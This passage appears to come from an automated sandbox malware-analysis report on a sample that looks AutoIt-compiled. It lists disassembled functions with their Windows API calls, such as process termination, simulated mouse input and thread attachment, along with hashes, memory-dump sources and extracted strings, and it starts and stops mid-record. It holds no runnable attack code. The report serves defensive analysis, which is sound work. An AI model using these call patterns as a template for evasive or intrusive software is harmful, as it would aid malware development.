                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: bc04114deabffc1d86a816457ff63d94b584e67ad8ca800720ea1672a8ee9654
                    • Instruction ID: 0199663ae12168740273171e4e74dbe188d3230592064448e64132f7bb2021ba
                    • Opcode Fuzzy Hash: bc04114deabffc1d86a816457ff63d94b584e67ad8ca800720ea1672a8ee9654
                    • Instruction Fuzzy Hash: 8151A071A00245DBDF24CF68DC88BAEBBF5EF64314F10426AE6219B3D1D7709A05EB61
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C7179A
                    • GetWindowRect.USER32(?,?), ref: 00C717FE
                    • ScreenToClient.USER32(?,?), ref: 00C7181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C7182C
                    • EndPaint.USER32(?,?), ref: 00C71876
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 521f889dd39219fdf6fd5ecaa03642f717e0da16372f08c3e8e0e41f8285e7e4
                    • Instruction ID: c387be0ea6eacb5e8137683ae5de02fdc52313c3ab86270a2c7597b94dc4cca5
                    • Opcode Fuzzy Hash: 521f889dd39219fdf6fd5ecaa03642f717e0da16372f08c3e8e0e41f8285e7e4
                    • Instruction Fuzzy Hash: 62416271104301AFD710DF29CC84B7A7BE8EB49724F188669F968C62E2C7719D45EB62
                    APIs
                    • ShowWindow.USER32(00D367B0,00000000,00882760,?,?,00D367B0,?,00CFB862,?,?), ref: 00CFB9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 00CFB9F0
                    • ShowWindow.USER32(00D367B0,00000000,00882760,?,?,00D367B0,?,00CFB862,?,?), ref: 00CFBA50
                    • ShowWindow.USER32(00000000,00000004,?,00CFB862,?,?), ref: 00CFBA62
                    • EnableWindow.USER32(00000000,00000001), ref: 00CFBA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CFBAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: c67f25e41d8e3151c222597aabe7042702358268995e13282921beb615cf0d3b
                    • Instruction ID: 2d5aec41be376d7bc918a961262de7cc309d8eccdcf150ea4718e3c9bc458dac
                    • Opcode Fuzzy Hash: c67f25e41d8e3151c222597aabe7042702358268995e13282921beb615cf0d3b
                    • Instruction Fuzzy Hash: 9E414134600249AFDB61CF14C489BA97BF0FF05310F1841A9EB688F6A2C771EE46DB52
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00CE5134,?,?,00000000,00000001), ref: 00CE73BF
                      • Part of subcall function 00CE3C94: GetWindowRect.USER32(?,?), ref: 00CE3CA7
                    • GetDesktopWindow.USER32 ref: 00CE73E9
                    • GetWindowRect.USER32(00000000), ref: 00CE73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CE7422
                      • Part of subcall function 00CD54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD555E
                    • GetCursorPos.USER32(?), ref: 00CE744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CE74AC
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 1ef27417ec5de40193ff72c61b0aa09ce4edf6f2db0698a08ad881865dbd3cd4
                    • Instruction ID: c56ad358b831714ddbbe4fc4bcdb138e6273e8ccb27983c21199db471e0e8619
                    • Opcode Fuzzy Hash: 1ef27417ec5de40193ff72c61b0aa09ce4edf6f2db0698a08ad881865dbd3cd4
                    • Instruction Fuzzy Hash: BB31D472508345ABD720DF15D849F5FBBA9FF88314F000A1AF59997191DB30EA09CB92
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CCE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CCE120
                    • SysAllocString.OLEAUT32(00000000), ref: 00CCE123
                    • SysAllocString.OLEAUT32 ref: 00CCE144
                    • SysFreeString.OLEAUT32 ref: 00CCE14D
                    • SysAllocString.OLEAUT32(?), ref: 00CCE175
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$Free
                    • String ID:
                    • API String ID: 1313759350-0
                    • Opcode ID: a0305f1cea2073b0100661e72ade315129e92b0a77489891bcac04fd111cbfaf
                    • Instruction ID: 683f6a5a3a066a169e92dce88dc2e8c43266cd51bed8410afed9afa3e4820c3e
                    • Opcode Fuzzy Hash: a0305f1cea2073b0100661e72ade315129e92b0a77489891bcac04fd111cbfaf
                    • Instruction Fuzzy Hash: 92217136604108AF9B109FA9DC88EBF77ECEF0A760B148129F915CB2A1DA70DD41DB64
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                    • _wcstok.LIBCMT ref: 00CDEEFF
                    • _wcscpy.LIBCMT ref: 00CDEF8E
                    • _memset.LIBCMT ref: 00CDEFC1
                    Strings
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: 9892a1a613fb7cf12d2e47a1bfd07c6c26c4493b2c45836a09c514a28a148d3c
                    • Instruction ID: e8c5323d9ff540ff038218e49ce7c5d756a3cc4cbab77d53b070e3f3c9389d24
                    • Opcode Fuzzy Hash: 9892a1a613fb7cf12d2e47a1bfd07c6c26c4493b2c45836a09c514a28a148d3c
                    • Instruction Fuzzy Hash: A3C13C715083409FC724EF24C885A6AB7E4FF85310F14892DF99A9B3A2DB70ED45DB92
                    APIs
                      • Part of subcall function 00CC85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CC8608
                      • Part of subcall function 00CC85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CC8612
                      • Part of subcall function 00CC85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CC8621
                      • Part of subcall function 00CC85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00CC8628
                      • Part of subcall function 00CC85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CC863E
                    • GetLengthSid.ADVAPI32(?,00000000,00CC8977), ref: 00CC8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CC8DB8
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00CC8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00CC8977), ref: 00CC8DEC
                    • HeapFree.KERNEL32(00000000), ref: 00CC8DF3
                    Similarity
                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 169236558-0
                    • Opcode ID: e41a6ed5a8552aec6304b40497d97bedb0e3cc51853888c9aff6858cb5185f74
                    • Instruction ID: b25c10c1cba61b01dc5895a1c6591a3db48f0af260f79afc1cba219bde6f3066
                    • Opcode Fuzzy Hash: e41a6ed5a8552aec6304b40497d97bedb0e3cc51853888c9aff6858cb5185f74
                    • Instruction Fuzzy Hash: 3111A932600606FFDB109FA4CC49FBF7BA9EF55316F10802DE85697250CB32AA49DB60
                    APIs
                      • Part of subcall function 00C712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C7134D
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7135C
                      • Part of subcall function 00C712F3: BeginPath.GDI32(?), ref: 00C71373
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CFC1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 00CFC1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFC1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 00CFC1F6
                    • EndPath.GDI32(00000000), ref: 00CFC206
                    • StrokePath.GDI32(00000000), ref: 00CFC216
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: 49c56242f601675f80c1d0cfe414b0d71ec315cf0ce4bb8c10084808f068df06
                    • Instruction ID: 90d8b71130773a35d68860e7aa074f81e6b1cb5990ae0724bc0beb7bf7daac7c
                    • Opcode Fuzzy Hash: 49c56242f601675f80c1d0cfe414b0d71ec315cf0ce4bb8c10084808f068df06
                    • Instruction Fuzzy Hash: AF111B7640010CBFEF119F94DC88FAE7FADEF08354F048025BA188A1A1C7719E55DBA1
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C903D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C903DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C903E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C903F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C903F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C90401
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 728bafe903ced34c5c7f16fcea0c74025b76234d0d2c8e2174a2eda4cfa6a0c0
                    • Instruction ID: 2f7c531674dbb4d1cd4153b191b7ccd2c655adc7aa58b91e5d822d7f2e4a1cf3
                    • Opcode Fuzzy Hash: 728bafe903ced34c5c7f16fcea0c74025b76234d0d2c8e2174a2eda4cfa6a0c0
                    • Instruction Fuzzy Hash: 000148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA15887941C7B5A864CBE5
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CD569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CD56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00CD56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD56E0
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 777103499abbe36b065718f03badee92d8ab1a114a1ffbe55fbf96d94298f6d2
                    • Instruction ID: 461a62d21eff2c7b39f0beb2877c475bdd91bbb8ed4c0e48605d92ce9f4d198d
                    • Opcode Fuzzy Hash: 777103499abbe36b065718f03badee92d8ab1a114a1ffbe55fbf96d94298f6d2
                    • Instruction Fuzzy Hash: 03F01D32241159BBE7215BA29C0DFFF7A7CEFC6B11F00016DFA04D11609AA15A02C6B6
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00CD74E5
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00CD74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00C81044,?,?), ref: 00CD7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C81044,?,?), ref: 00CD7510
                      • Part of subcall function 00CD6ED7: CloseHandle.KERNEL32(00000000,?,00CD751D,?,00C81044,?,?), ref: 00CD6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD7523
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00CD752A
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: cb767f3145d31e7acc7600ff5cc8d05f751539f74ffdc1b81044a5ec5805e677
                    • Instruction ID: 069eef2b5b194566eebeec685a04b1b535d75d05a2eaa59db5ba2b450d4c1084
                    • Opcode Fuzzy Hash: cb767f3145d31e7acc7600ff5cc8d05f751539f74ffdc1b81044a5ec5805e677
                    • Instruction Fuzzy Hash: A0F05E3A140612EBDB111B64FC8CBFF7B3AEF45302B00063AF202915B1DB755902CB52
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00CE8928
                    • CharUpperBuffW.USER32(?,?), ref: 00CE8A37
                    • VariantClear.OLEAUT32(?), ref: 00CE8BAF
                      • Part of subcall function 00CD7804: VariantInit.OLEAUT32(00000000), ref: 00CD7844
                      • Part of subcall function 00CD7804: VariantCopy.OLEAUT32(00000000,?), ref: 00CD784D
                      • Part of subcall function 00CD7804: VariantClear.OLEAUT32(00000000), ref: 00CD7859
                    Strings
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 76368d2250073ffedeae13db477c8446d49d8c68fb12bdcae2ffa4f8feef5986
                    • Instruction ID: 0d710f4e2842636de8ebf0a5aa0c14cb46bb94661a5e1df85d31c06f9c552c6b
                    • Opcode Fuzzy Hash: 76368d2250073ffedeae13db477c8446d49d8c68fb12bdcae2ffa4f8feef5986
                    • Instruction Fuzzy Hash: 23919E716083419FCB10DF25C48596BBBF4EF89714F04896EF89A8B362DB31E909DB52
                    APIs
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                    • _memset.LIBCMT ref: 00CD3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CD30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CD3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CD3187
                    Strings
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: f2d09b33aed685453804989a97d9a302f44d7a6b5c2af3a0cac23a75e1776d12
                    • Instruction ID: 7cd070200c70ef9d5675a7beae37f0759124434b80da6e27ad32d64e40f08642
                    • Opcode Fuzzy Hash: f2d09b33aed685453804989a97d9a302f44d7a6b5c2af3a0cac23a75e1776d12
                    • Instruction Fuzzy Hash: 4351CF31608382AAD7259F28C845A6FB7E4EF55350F044A2EFAA5D23A0DB70DB44D763
                    APIs
                    • _memset.LIBCMT ref: 00CD2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CD2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00CD2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D36890,00000000), ref: 00CD2D5A
                    Strings
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: f0ec6f4e1abc6079e8738bd2faf1c719c1337442a5af7786a42ed2b2362f220a
                    • Instruction ID: 23553e1d15800ee26fe41f8fe7305544a9954e13479f4ba9711b82817e940388
                    • Opcode Fuzzy Hash: f0ec6f4e1abc6079e8738bd2faf1c719c1337442a5af7786a42ed2b2362f220a
                    • Instruction Fuzzy Hash: E64191312043419FD720DF24C885B5ABBE9EF95320F14465EFA65973D1D770E905CBA2
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CEDAD9
                      • Part of subcall function 00C779AB: _memmove.LIBCMT ref: 00C779F9
                    Strings
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 5e3016b5ad9a03605176d1680697c6e0d4287cf62ef47e79c31a24d269d34125
                    • Instruction ID: 12087c82ff631fcdc204edca1c34edaefb4a4e405d6787960159e92429aa1bc3
                    • Opcode Fuzzy Hash: 5e3016b5ad9a03605176d1680697c6e0d4287cf62ef47e79c31a24d269d34125
                    • Instruction Fuzzy Hash: 0531B071900259AFCF00EF55CC819AEB3B4FF15320B10862AE876A77D1DB71AA06DB90
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CC93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CC9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CC9439
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    Strings
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: caf2dbd97a320790c2a0c03caf861ffff68be0e70f90b611565508cba88d455d
                    • Instruction ID: 8e5617c7237de3ec056a98cad43f055c0fa8e20d27735aec3af456236ed888e7
                    • Opcode Fuzzy Hash: caf2dbd97a320790c2a0c03caf861ffff68be0e70f90b611565508cba88d455d
                    • Instruction Fuzzy Hash: A521B671900108AEDB18ABB4DC8AEFFB778DF05360B14822DF925971E1DB355A0AE620
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CF6FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CF6FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CF6FDF
                    Strings
                    • Listbox, xrefs: 00CF6F77
                    • 06044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18486044B184d6044B18466044B18406044B184f6044B184f604, xrefs: 00CF6F2F
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: 06044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18486044B184d6044B18466044B18406044B184f6044B184f604$Listbox
                    • API String ID: 3315199576-1950489579
                    • Opcode ID: 4074b8997ddb62903ac4deb140375fac4ded9f754ebe2c75f9f3f28a5b821f8d
                    • Instruction ID: 778b09ccde1d93795d911508f8a5290dd007a297917a9075cd8bfe6f1d3270bb
                    • Opcode Fuzzy Hash: 4074b8997ddb62903ac4deb140375fac4ded9f754ebe2c75f9f3f28a5b821f8d
                    • Instruction Fuzzy Hash: 01218032610118BFDF518F94DC85FBB3BAAEF89764F118124FA149B190CA71AC52DBA1
                    APIs
                      • Part of subcall function 00C71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C71D73
                      • Part of subcall function 00C71D35: GetStockObject.GDI32(00000011), ref: 00C71D87
                      • Part of subcall function 00C71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C71D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CF66D0
                    • LoadLibraryW.KERNEL32(?), ref: 00CF66D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CF66EC
                    • DestroyWindow.USER32(?), ref: 00CF66F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: dbfcfd9ba4c3dac1fa49ceca88a28918eaa6d687f06436840e7a995bde6126fb
                    • Instruction ID: cb4195621f5ab54654d4e862490514d1a116dda4b5a65c7b607b71fbab6f135d
                    • Opcode Fuzzy Hash: dbfcfd9ba4c3dac1fa49ceca88a28918eaa6d687f06436840e7a995bde6126fb
                    • Instruction Fuzzy Hash: 3D21BB7120020ABBEF504F64EC80EBB77ADEF59328F104629FA60D21A0D7B1CC41A762
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00CD705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 00CD70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CD70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 71e5c049e9fdfa7225faa5f4c2156e15022557cdd2119951c6e5cc2affb77968
                    • Instruction ID: c4fd51ae26fad6b78e82f4d751fe3cd3df6f654904d6423af583284acaf2ea26
                    • Opcode Fuzzy Hash: 71e5c049e9fdfa7225faa5f4c2156e15022557cdd2119951c6e5cc2affb77968
                    • Instruction Fuzzy Hash: 892171745042059BDB209F29DC05BAE7BB4AF44720F204B1AFEB0D73D0E770A951CB51
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00CD712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 00CD716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CD71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 268e5e956ce684476027c07efdf50521f3ca07587ccc61d0ea8ce739ea7d65f5
                    • Instruction ID: fd988e192d5057fcbe12a501c855d3aca4bf752fc0e300f72b8eb62b5df3ebf8
                    • Opcode Fuzzy Hash: 268e5e956ce684476027c07efdf50521f3ca07587ccc61d0ea8ce739ea7d65f5
                    • Instruction Fuzzy Hash: C421A175504206ABDB209F699C04BAEB7A8AF55720F200B1AFEB5D33D0E7709941CB61
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CDAF13
                    • __swprintf.LIBCMT ref: 00CDAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CFF910), ref: 00CDAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: bb05a3440dc705920d32e428f9e03aaf7855fb6aefca29cdc6ab6ae15822dd9b
                    • Instruction ID: 91bbc674e575fa227485921db86495f2fc96cc17322a38bc028ebf4cb8d4bdfa
                    • Opcode Fuzzy Hash: bb05a3440dc705920d32e428f9e03aaf7855fb6aefca29cdc6ab6ae15822dd9b
                    • Instruction Fuzzy Hash: B8219831A00109AFCB10DF54CD85EAE7BB8EF49714B008069F909EB351DB71EE41DB21
                    APIs
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                      • Part of subcall function 00CCA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCA399
                      • Part of subcall function 00CCA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCA3AC
                      • Part of subcall function 00CCA37C: GetCurrentThreadId.KERNEL32 ref: 00CCA3B3
                      • Part of subcall function 00CCA37C: AttachThreadInput.USER32(00000000), ref: 00CCA3BA
                    • GetFocus.USER32 ref: 00CCA554
                      • Part of subcall function 00CCA3C5: GetParent.USER32(?), ref: 00CCA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00CCA59D
                    • EnumChildWindows.USER32(?,00CCA615), ref: 00CCA5C5
                    • __swprintf.LIBCMT ref: 00CCA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
